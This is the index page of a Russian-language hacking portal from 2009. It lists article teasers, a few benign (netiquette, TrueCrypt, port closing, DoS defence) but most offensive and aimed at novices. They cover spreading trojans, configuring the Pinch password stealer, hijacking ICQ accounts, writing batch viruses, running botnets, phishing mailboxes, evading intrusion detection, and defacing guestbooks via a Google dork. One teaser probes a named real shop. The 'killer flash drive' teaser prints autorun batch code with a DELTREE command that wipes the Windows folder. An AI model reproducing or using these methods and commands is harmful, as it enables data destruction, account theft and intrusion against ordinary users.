[ Attackers.io.ua © 2009 ] ALL WEB IN HERE...

Сетевой этикет (Перед тем, как задать вопрос хакеру)
Как интерпретировать ответы RTFM и STFW: как понять, что вы серьезно облажались Есть древняя и священная традиция: если вы получаете ответ "RTFM", значит, отвечающий думает, что вам стоит почитать руководство (Read The Fucking Manual). Он почти наверняка прав. Читайте. У ответа RTFM есть более молодой аналог. Если вы получаете ответ "STFW", значит, отвечающий думает, что вам стоит поискать ответ в сети (Search The Fucking Web). Он почти наверняка прав. Ищите. ...
18 дек 2009 {1138 просмотров}
10 основных правил для эффективного администрирования
10 основных правил для эффективного администрирования Следующие 10 пунктов рекомендаций это больше чем просто правила, которые я выучил за более чем 10 лет интенсивной работы в IT инфраструктуре. Эти рекомендации очень широки и могут быть полезны для любого, кто администрирует IT системы, включая администраторов Linux/Windows, сетевых администраторов и DBA. 1. Сохраняйте простоту. В техническом окружении сохранять простоту вещей дает очень большой эффект. При администрировании, когда прих ...
18 дек 2009 {616 просмотров}
Как успокоить нервы: 25 способов
Данные способы писал псих-америкос, у них другие стрессы и проблемы, но кое-что можно взять на вооружение. 1. Совершите 10-минутную прогулку. Это поможет телу расслабиться и сбросить напряжение, ведущее к тревоге. 2. Послушайте рассла***ющую или хотя бы обычную музыку, которая вам нравится. Это поможет вам отвлечься от плохих мыслей. 3. Остановите навязчивые мысли. Еще лучше будет интенсивно поработать на природе. 4. Перестаньте говорить о вашем прошлом. Если у вас это так просто не ...
18 дек 2009 {626 просмотров}
Как сделать зашифрованную USB флешку?
Шаг 1. Качаем TrueCrypt . Сейчас последняя версия – 6.1а. Есть руссификация . TrueCrypt – бесплатная программа с открытым кодом для шифрования данных. Работает под Windows, Mac и Linux. Устанавливаем TrueCrypt на компьютер. Установка TrueCrypt-a нам нужна только для создания флешки. Потом TrueCrypt можно удалить. Шаг 2. Подготовим флешку для работы. Для начала стираем оттуда все данные. Теперь запускаем TrueCrypt и выбираем пункт меню Tools --> Traveler Disk Setup… В появившимс ...
18 дек 2009 {1406}
Закрытие портов 135 и 445 вручную
135 и 445 необходимо закрыть - это серьёзные дырки. Если фаером не получается а это бывает то надо делать следущее: 1. Закрываем порт 135 (Disabling Distributed COM (DCOM)). Способ 1: Пуск -> Выполнить и вводим Dcomcnfg.exe Что бы выключить DCOM, открываем панель "Свойства по умолчанию" и убираем галочку "Разрешить использовать DCOM на этом компьютере". Перезагружаемся. Способ 2: В ключе регистра HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle у параметра "Enable ...
18 дек 2009 {1685}
SoftIce для начинающих
Тебе никогда не хотелось иметь у себя программу, с помощью которой можно ломать игрушки, shareware и trial программы и вообще все, что запускается на компьютере? Я думаю, что хотелось. А такая программа существует! И уже достаточно давно. Это SoftICE от NuMega Software. Просто считается, что ее использование это удел избранных программистов, разбирающихся в архитектуре процессора, устройстве железа, в ассемблере и принципах действия операционных систем. Но на самом деле и минимальных знаний дост ...
18 дек 2009 {904}
Что называется системой Искусственного интеллекта?
Понятие ИСКУССТВЕННОГО ИНТЕЛЛЕКТА МОЖЕТ БЫТЬ рассмотрено с разных сторон. Со стороны интеллекта Искусственный интеллект -это то, что делает машины "интеллектуальными" - действие, подобное тому, которое мы могли ожидать от людей. Неспособность отличать реакции компьютера от человеческих реакций названа критерием Тьюринга. Интеллект требует знания. Решение задач на практике связано с ограничением прикладной области с тем, чтобы использовать существенное подходящее знание. Со ...
18 дек 2009 {1058}
Эффективный способ впаривания троянов
Сразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже ра ...
18 дек 2009 {594}
Что можно сделать с IP адресом
Что можно сделать с IP адресом Как известно, Internet основана на семействе протоколов tcp/ip, определяющих, каким образом осуществляется взаимодействие между подключенными к сети компьютерами. Идентификация этих компьютеров осуществляется с помощью так называемых IP-адресов, каждый из которых представляет собой уникальный 32-битный идентификатор, обычно записываемый в виде четырех десятичных чисел, например, 192.168.0.1. И с точки зрения адресации сервер, обрабатывающий ежесекундно тысячи запро ...
18 дек 2009 {14140}
Сканирование портов
Иногда у вас может возникнуть потребность узнать какие сервисы предоставляет определенный хост. Для этого существует ряд различных программ сканирования портов. Простейший вариант - это программы типа SATAN (Security Analysis Tool for Auditing Networks), которые устанавливают соединение с каждым TCP-портом, открывая полное TCP-соединение. Преимущества этого метода заключаются в том, что пользователю, занимающемуся сканированием, не нужно самому составлять ip-пакет, который будет использова ...
18 дек 2009 {483}
Рекламма в Интернете
Буддийская философия как идейная основа буддийской цивилизации Пусть это будет и некоторым преувеличением, но все же есть основания утверждать, что еще ни одной из работ, заявленных как "исследование буддийской философии", до сих пор не удавалось удерживаться строго в пределах таким образом обозначенной авторами темы - все они, так или иначе, неизбежно выходили за границы того, что принято считать собственно "философией". Проблема заключалась, конечно, не в авторах, а ...
18 дек 2009 {466}
Полный мануал по взлому
Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться. Приступим: Самое ...
18 дек 2009 {669}
ОС программиста
UNIX был изобретен AT&T где-то в 60-ых как "операционная система программиста". Во времена, когда изобрели UNIX, эта цель не была, вероятно, достигнута, зато теперь, похоже, UNIX стала ОС программиста. Как уже говорилось, это многозадачная и многопользовательская ОС. К тому же она написана на языке С, во всяком случае, немалая ее часть, что делает её портативной операционной системой. UNIX не соответствует никаким компьютерам, поскольку был адаптирован ко многим, и существ ...
18 дек 2009 {498}
Кодекс хакера
В пpоцессе исследования хакеpства как стиля жизни, на основе полученных наблюдений мной были сгенеpены следующие пpавила, котоpые я без тени ложной скpомности pешил назвать кодексом хакеpа. 1. Хакеp - всегда один, его личная жизнь состоит только из поездок в общественном тpанспоpте, у него есть только одна девушка - машина. 2. ДОС - дыpява, ее можно ломать. 3. Hе будет никогда пpогpаммы, в котоpой не будет багов (пpоколов,дыpок, глюков). 4. Hет такой пpогpаммы, котоpую невозможно взлом ...
18 дек 2009 {1265}
Как защитить свой UIN
Пароль. И так, Ваш пароль, он то и нужен человеку, который хочет заполучить Ваш UIN. Какой у Вас пароль? Вы не задумывались? А может вообще его не помните :) ? Тогда сразу идите в аську, открывайте закладу "Security" и вписывайте новый пароль. Только не надо писать, что-нить банальное, вроде своего имени или 12345, qwerty и т.д. Пароль есть пароль!. По-этому советую Вам сделать его как можно надежней. Например C^н8|S-Б - серьезно, не правда ли? Такой пароль состоит из заглавных р ...
18 дек 2009 {432}
Как заиметь красивый UIN
Итак, способы (даны чисто в ознакомительных целях :) ): Троян. Что тут можно сказать. Все что Вам нужно - это хороший троян + немного смекалки. Трой не обязательно должен не ловиться антивирусом. Как Вы думаете, какой процент того что у данного юзера стоит антивирус, тем более обновленный если всего пользователей в Мире около 295 миллионов, а "защищенных" из них 17.750.000 я думаю всего 16% приблизительно :) . Если он все же стоит, тогда придется применять не этот метод или искать троя ...
18 дек 2009 {997}
Взлом через PHP-скрипт
Данная атака на сервер проходит со 100% гарантией. Для успешной атаки взломщику необходимо дисковое пространство на сервере размером в 10 Kb (столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему используя социнженерию, тоесть изначально подготавливают жертву, чтобы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайн ...
18 дек 2009 {3265}
Взлом html-чатов
Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. Начал я с малого. В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа <input type=hidden name=cookie value=SP202134> (так в партизанах хранится UserID) Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем с ...
18 дек 2009 {579}
Бан или как выкидывают из чатов
Администраторы делают так: 1. Запрет на вход юзеру с данным именем (или удаление регистрации) - самое простое-просто меняем себе ник (можно даже сделать его точгно таким же как и был с помощью короткого дефиса) 2. Блокирвка через кукисы. Админ прописывает в кукисы на машине юзера специальный код - решается тоже просто - удаляем кук чата из директории C:WINDOWSCookies (если не знаете какой именно кук удалить-смело удаляйте все, большой беды не будет) 3. Самое печальное - блокирвка IP. Блок ...
18 дек 2009 {452}
50 способов обойти систему обнаружения атак
Вставка посторонних символов в атаку, что обычно приводит к невозможности ее обнаружения. (Примечание переводчика - это касается систем обнаружения злоупотреблений, которые используют сигнатуры атак). Использование табуляций вместо пробелов в командах. Такое изменение разделителя может также привести к невозможности обнаружения атаки. Очень близкий путь к п.2. Вы могли бы изменить символ разделителя в системе (например, на %), что приведет к определенным проблемам с системами обнаружения ата ...
18 дек 2009 {397}
syn-flood атака
Проблемы, не зависящие от атакующего. Некоторые провайдеры (и чем дальше, тем больше таких появляется) фильтруют трафик своих клиентов на предмет подделки адреса отправителя. Есть большая вероятность, что возможнось спуфинга ограничивается подсетью класса C. Кроме того, хост, адрес которого указывается в запросе на подключение, не должен реагировать на ответы сервера - проще всего выбрать адрес, на котором нет машины. При практической реализации, особенно создавая универсальный инструмент для к ...
18 дек 2009 {893}
Обнаружение скрытых процессов
Многие пользователи привыкли к тому, что в Windows NT диспетчер задач показывает все процессы, и многие считают, что скрыться от него вообще невозможно. На самом деле, скрыть процесс черезвычайно просто. Для этого существует множество методов, и их реализации доступны в исходниках. Остается только удивляться, почему так редки трояны использующие эти методики? Их буквально 1 на 1000 не умеющих скрываться. Я думаю, это объясняется тем, что авторам троянов лень, ведь для этого необязательно писать ...
04 ноя 2009 {894}
Дефейс за 2 минуты!
Дефейс за 2 минуты! Добро пожаловать! Вы давно хотели сделать дефейс, но ничего не получалось? Сегодня мы разберем дефейсы гостевых, скажу сразу – это будет непросто, а очень просто! Приступим! Для начала попробуем найти уязвимые гостевые, открываем http://www.google.ru/ и вбиваем такой запрос: filetype:dat passwd Команда filetype:dat passwd найдет все файлы с расширением dat, слово passwd говорит о том, что надо искать файл passwd.dat где и хранятся пароли от админки гостевой! Выбираем ...
04 ноя 2009 {840}
Руководство по троянам
"papst" Ко мне приходит довольно много писем с просьбами написать как пользоваться троянами, что такое троян и т.д. Поэтому я решил написать эту статью и охватить все вопросы касающиеся троянов: что такое троян, виды троянов, настройка, защита. Многие называют троян вирусом, на самом деле это не так. Троян это маленькая программка с помощью которой вы в большинстве случаев можете контролировать чужим компьютером (в зависимости от трояна). Еще их называют утилитами удаленного упра ...
04 ноя 2009 {845}
Большая статья по написанию бат вирусов
Сегодня я росскажу как написать доволь мощный вир будем начинать с нуля чтобы создать бат вирус нужно открыть блокнот написать команды,и сохранить с разришением .bat Кстати можете не читать в конце я предлогаю вам свой вирус. Как вы поняли к командам существуют и специальные параметры определяющие как команда будет выполняться. Вот например после команды start мы видим параметр /min он, как я уже говорил так же запускает пиложение, но в свёрнутом виде. Если за место него мы написали бы /max, ...
04 ноя 2009 {881}
Ботнет - Страшный зверь
Приветсвую всех хакеров,крэкэров,кодеров и новичков!С вами снова я - redbu11.Ну вот я опять пишу сатью,и в этот раз на одну очень интерестную тему.Всё меньше и меньше я стал видеть в инете сатей о таких монстрах как БОТНЕТ.Я думаю все мы знаем что это такое,ну а те кто не знают что это,то не надо расстраиватся!Я сегодня вам раскажу не только что это такое,но и как это всё организовать!Давайте наконец приступим к изучению. И так,вы наверное все спрашивавете,а что же такое ботнет,и что такое бот? ...
04 ноя 2009 {538}
Фейк новичкам.
Привет новички!С вами в очередной раз redbu11.Эта статья посвещена новичками и только им,и по их же прозьбам.Мне в асю часто стали писать вопросы по поводу взлома ящиков с просьбой их научить этому.Но,вы сами понимаете что по асе так не обьяснишь всё доступно.Вот именно по этому я решился написать эту статью.Надеюсь что после этой статьи в мою асю будет поступать меньше флуда по этой теме :-) И так господа ( и конечно же дамы :-) ) сегодня мы будем учится такому методу взлома ящиков как фейк ...
04 ноя 2009 {837}
Пополняем знания как искать баги!
<Предисловие> Всем привет!Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом! P.S Не судите строго это моя первая статья! Так поехали!Жертва станет shop.iskusnitsa.ru! Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!!Начнем с обследования сайта. 1:НАПЯЛИВАЕМ ПРОКСИ!!!Элиту есть такая прога как proxyswitch ...
04 ноя 2009 {613}
Флешка-Убийца
Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней: AUTOEXEC.BAT Dead.BAT autorun.ini ______________________________ в AUTOEXEC.BAT пишем: goto %config% :dos1 rem c:vc401vc lh keyrus lh mmouse lh C:WINDOWSCOMMANDmscdex /d:12345678 lh dndn bootgui=0 :dos2 rem essolo.com lh keyrus lh mmouse lh dndn bootgui=0 :win rem c:essolo.com set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn C:WINDOWSCOMMANDDELTREE /y C:WINDO ...
04 ноя 2009 {486}
Введение в СИ
Введение в СИ. ------------------------ Содержание: 1. СИ, кратко обо всём. 2. Психология человека. 3. Методы получения информации. 4. Послесловие. -------------------------------------------------------------- -------------------СИ, кратко обо всём----------------- -------------------------------------------------------------- Дорогие начинающие хакеры (и не начинающие тоже), я рад представить Вам свою статью по Социальной Инженерии. Что такое Социальная Инженерия? В Интернете есть м ...
04 ноя 2009 {478}
Атака на DNS
1. DNS с высоты птичьего полета Служба доменных имен представляет собой распределенную базу данных, основным содержанием которой является информация о соответствии символических имен сетевых объектов их IP-адресам. DNS организована по иерархическому принципу. Структурной единицей этой базы является домен (domain), который в свою очередь может содержать другие домены (поддомены). Первичным источником информации о каждом домене является ответственный за данный домен DNS-сервер (на самом деле и ...
04 ноя 2009 {662}
Защита от вирусов
Данная статья посвящена методам защиты от вредоносного программного обеспечения. Ключом к организации эффективной антивирусной защиты является наличие антивирусного средства. Для начала рассмотрим основные требования, которым должно удовлетворять современное антивирусное программное обеспечение. К антивирусному программному обеспечению предъявляются такие же требования, как и к остальным программным продуктам – удобство использования и широкие функциональные возможности, определяемые возможно ...
04 ноя 2009 {583}
Конституция хакера
(Вступление) Как же стать хакером? Это первый вопрос всех новичков. По этому поводу много статей написано, читайте их, но я считаю, что сначала нужно задаться вопросами: А кто же такой ХАКЕР? Что можно, а что нельзя? Нам, хакерам, социальному меньшинству, чтобы выжить, нужно обьединяться, учиться друг у друга, делиться опытом. Согласно УК стран, в которых мы живём, нам нельзя всё это делать по закону. Мир хакеров напоминает вулкан: он находится под корой, есть немного ключей обьединени ...
04 ноя 2009 {486}
Угон и защита icq уинов
Если хочется 8-ми значный uin... Хотя нет. Пожалуй 7-ми значный... Или 6-ти ;-) Вообщем если не важен номер, а важно только количество знаков в номере то это самый реальный способ. Внизу есть инструкция по взлому определенного уина, но говорю сразу, что это практически не реально. Ибо взлом кучи уинов проходит по принцыпу обнаружения лохов и таких же паролей ;-) А вот определенный уин... Вообще думайте, но лучше время не тратить. Если хотите инструкцию в одну строчку, то вот : Берем V-ListMa ...
04 ноя 2009 {459}
Как грамотно убить компьютер
Существует множество причин, по которым кому то может понадобиться убить или ввести в состояние клинической смерти какую‑либо компьютерную железку. Наиболее часто такая потребность возникает, когда, к примеру, на работе «совершенно случайно» покупают новые компьютеры для секретарш с характеристиками, больше подходящими для хардкорного геймера. Утерю гарантии устроить не составит труда, а вот организовать списание железа бывает намного сложнее. Или, к примеру, хакер купил новую железку, не ...
04 ноя 2009 {627}
Атаки в сети Интернет
1. Denial of service (DOS) Класс атак, приводящих к отказу в обслуживание. Во время та- ких атак происходит повышенный расход ресурсов процессора и уменьшение канала пропускной возможности канала связи, что может привести в сильному замедлению работы всей компьютерной системы, отдельных задач либо вообще к полному останову задач пользовате- ля. Пример. Вы пошли в магазин за хлебом, а там два часа назад хулиганы побили все стекла и весь персонал занят их уборкой; воз- ле входа в магаз ...
03 ноя 2009 {1348}
Ставим Socks своими руками
Вы наверно не раз сталкивались с необходимостью сделать своё пребывание в сети анонимным. Вы наверное уже знаете что наиболее простым и дешевым способом анонимизировать себя в сети является работа через прокси сервер/ы. И каждый более-менее заботящийся о своей безопасности юзер работает через прокси. Рассказывать что такое прокси и какие они бывают я не буду. Ты юзаешь прокси? Уверен что да. А ты никогда не задумывался откуда они берутся и для чего их создают а? Подумай сам, ведь прокси генер ...
03 ноя 2009 {1293}
Инструкция по трояну Pinch
Автор: Terabyte (http://www.web-hack.ru) ==== Intro ==== Прошу не удивляться, что я решил написать подобную статью (article for lamerzzz). Дело в том, что на моем форуме (http://forum.web-hack.ru) примерно раз в три дня создается тема, вроде "Как правильно настроить и использовать Pinch?", "Как пользоваться Pinch`ем?" и т.д. ========== Возможности ========== Данный троян получил довольно большое распространение в 2003/2004 году. Все благодаря возможности краст ...
03 ноя 2009 {2687}
Google - лучший друг хакера
Автор: Paris2K Labs За последние несколько лет появилось множество статей, которые предупреждают о том, что хакеры (или cracker'ы, если хотите) используют поисковую систему google для получения доступа к файлам, к которым, по идее, они доступа иметь не должны. То, что я расскажу вам, возможно, кто-то уже давно использует в своих целях, но мне всегда было интересно самому узнать, как это работает. В 2001 году, James Middleton написал статью для vnunet.com, в которой шла речь об использовании х ...
03 ноя 2009 {10956}
FAQ, читать всем!
Автор: Pupkin-Zade Универсальный ФАК тут: http://google.com пишеш ему вопрос, а он тебе кучу ответов!!! Собрание ссылок, желательно посетить все... Вот по этим ссылкам походите: http://inattack.ru http://www.xakep.ru http://xakepy.ru http://web-hack.ru http://nsd.ru http://seclab.ru http://securityfocus.com http://security.nnov.ru http://antichat.ru http://hackersfaqs.h11.ru http://gh0sts.void.ru http://nst.void.ru http://anonymous.ru http://videohack.ru http://hack.co ...
03 ноя 2009 {1208}
Начинающим хакерам!
Что такое хэкер? "Жаргон-файл" содержит кучу определений для термина "хэкер", большинство которых связано с технической компетентностью и удовольствием, получаемым от решения проблем и преодоления преград. Но если же вы хотите знать, как стать хэкером, то действительно существенными являются два аспекта. Имеется некоторое сообщество, некая общая культура, состоящая из опытных программистов и сетевых чародеев, которая ведет свою историю от многолетней давности первых миником ...
03 ноя 2009 {429}
Удаленный контроль через UDP
Программа написана Angelo Rosiello (Guilecool). --1) Интро С помощью этой статьи, я хочу показать, что возможно контролировать серверы с помощью UDP. Чтобы проиллюстрировать весь вопрос, я приведу пример программы, которая реализовывает этот способ. Вы можете найти эту программу по адресу: http://packetstormsecurity.org/UNIX/penetration/udp-remote-final.tar.gz. Но если вам лень, то в конце статьи будут приведены исходники. --2) Основы UDP Перед описанием самой программы и выполня ...
03 ноя 2009 {679}
Словарь терминов
Абсолютный сектор см. Сектор Атрибуты файла Характеристики файла: системный файл, скрытый файл, файл, закрытый от записи (read-only) и т.д. Вектор прерывания Элемент таблицы векторов прерываний. Содержит адрес программы-обработчика прерывания. Дизассемблер Утилита, осуществляющая преобразование, обратное ассемблированию, т.е. переводящая машинные коды в язык ассемблера. Такие утилиты крайне необходимы не только при отладке программ (для чего они и создаются), но и при анализе вируса ...
03 ноя 2009 {501}
Оборудование для взлома
Для того, чтобы стать удачливым компьютерным взломщиком, вам потребуется один прибор - ваши мозги. Вам не нужен даже компьютер. Более того, иногда бывает лучше вообще не иметь компьютера, как вы увидите в дальнейшем. Впрочем, для начала вам все же потребуется компьютер, модем и телефонная линия для связи с внешним миром. Компьютер может быть каким угодно. Гораздо важнее, какой у вас модем и коммуникационное программное обеспечение. Хакерство - хобби, не требующее большого количества снаряжени ...
03 ноя 2009 {923}
FAQ - трояны
Вопрос: Что такое троян? Ответ: Это программа, которая как правило выдает себя за что-нибудь мирное и чрезвычайно полезное (взломщик инета 8-) ). Нас интересуют интернет-трояны которые либо дают доступ к компьютеру с другого компа без ведома пользователя, либо высылают по определенному адресу какую-либо информацию с компьютера-жертвы (как правило пароли). Вопрос: Что может сделать человек, проникнув в чужой компьютер? Ответ: Все чего захочет: начиная простыми шуткам ...
03 ноя 2009 {449}
Удалённое управление за 5 минут
Написанное предполагает использование в LAN (LAN - Local Area Network, в народе "локалка"), однако вполне справедливо и для остальных сетевых систем и может быть с лёгкостью под них заточено :) Итак, начнём! Что нам понадобится: * Прямые руки * Хотя бы начальные знания по программированию на скриптовых языках * Установочный пакет Remote Administrator не ниже 2.0 * Программа Resource Hacker aka ResHacker * Упаковщик PE EXE файлов ASPack После того как ...
03 ноя 2009 {545}
syn-flood атака - практика
Проблемы, не зависящие от атакующего. Некоторые провайдеры (и чем дальше, тем больше таких появляется) фильтруют трафик своих клиентов на предмет подделки адреса отправителя. Есть большая вероятность, что возможнось спуфинга ограничивается подсетью класса C. Кроме того, хост, адрес которого указывается в запросе на подключение, не должен реагировать на ответы сервера - проще всего выбрать адрес, на котором нет машины. При практической реализации, особенно создавая универсальный инструмент для к ...
03 ноя 2009 {641}
Защита от DoS-атак
Меры противодействия DoS-атакам можно разделить на пассивные и активные, а также на превентивные и реакционные. Ниже приведён краткий перечень основных методов. * Предотвращение. Профилактика причин, побуждающих тех или иных лиц организовывать DoS-атаки. Очень часто атаки являются следствиями личной обиды, политических, религиозных разногласий, провоцирующего поведения жертвы и т. п. * Фильтрация и блэкхолинг. Эффективность этих методов снижается по мере приближения к цели атаки и ...
03 ноя 2009 {434}
Обнаружение DoS-атак
Существует мнение, что специальные средства для обнаружения DoS-атак не требуются, поскольку факт DoS-атаки невозможно не заметить. Во многих случаях это действительно так. Однако достаточно часто отмечались успешные атаки, которые были замечены жертвами лишь через 2-3 суток. Бывало, что негативные последствия атаки (типа флуд) заключались в излишних расходах по оплате трафика, что выяснялось лишь при получении счёта. Кроме того, многие методы обнаружения атак неэффективны вблизи цели атаки, но ...
03 ноя 2009 {444}
Виды DoS атак! DoS и DDoS
Здравствуйте, посетители портала ATTACKERS.io.ua В этой статье я расскажу о самой интересной атаке! О самой серьезной атаке! Я расскажу вам о DoS! Вы не знаете что это такое? Вы отстали от жизни, это дело надо исправлять. Пора вам продвинуться в области компьютерной безопасности. Новички, эта статья посвящается вам и только вам! DoS (Denial of Service) – отказ об обслуживании. Суть атаки состоит в убиении системы удаленного компьютера, повисания системы или отключения от сети и в вынужденной пе ...
03 ноя 2009 {1846}








DaMaGeLaB Pro-Hack.Ru XakNet TeaM InAttack BlackHack.Ru The Mafia
k0d.cc GraBBerZ.CoM BruteR.InfO Планету-ХаКеРаМ Defeated.Ru
World UNIX SecNull.Org CardersPlanet.Biz